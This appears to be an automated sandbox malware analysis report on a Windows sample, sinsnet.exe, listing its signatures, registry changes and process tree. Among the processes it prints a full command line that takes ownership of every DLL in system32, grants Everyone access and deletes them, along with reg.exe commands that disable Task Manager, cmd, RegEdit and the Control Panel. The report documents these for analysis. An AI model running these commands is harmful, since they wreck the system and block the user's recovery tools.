Malware Analysis Report

2024-11-16 12:57

Sample ID 240806-llawqswbln
Target sinsnet.exe
SHA256 233959352823b1e99961738ca7447ba106be4e17bc885b906c5997d5d2407d6f
Tags
discovery evasion exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

233959352823b1e99961738ca7447ba106be4e17bc885b906c5997d5d2407d6f

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Possible privilege escalation attempt

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Disables cmd.exe use via registry modification

Checks computer location settings

Modifies file permissions

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 09:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 09:36

Reported

2024-08-06 09:39

Platform

win7-20240705-en

Max time kernel

147s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2604 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2604 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2604 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2452 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

Network

N/A

Files

memory/2452-0-0x000000013FAB0000-0x000000013FC50000-memory.dmp

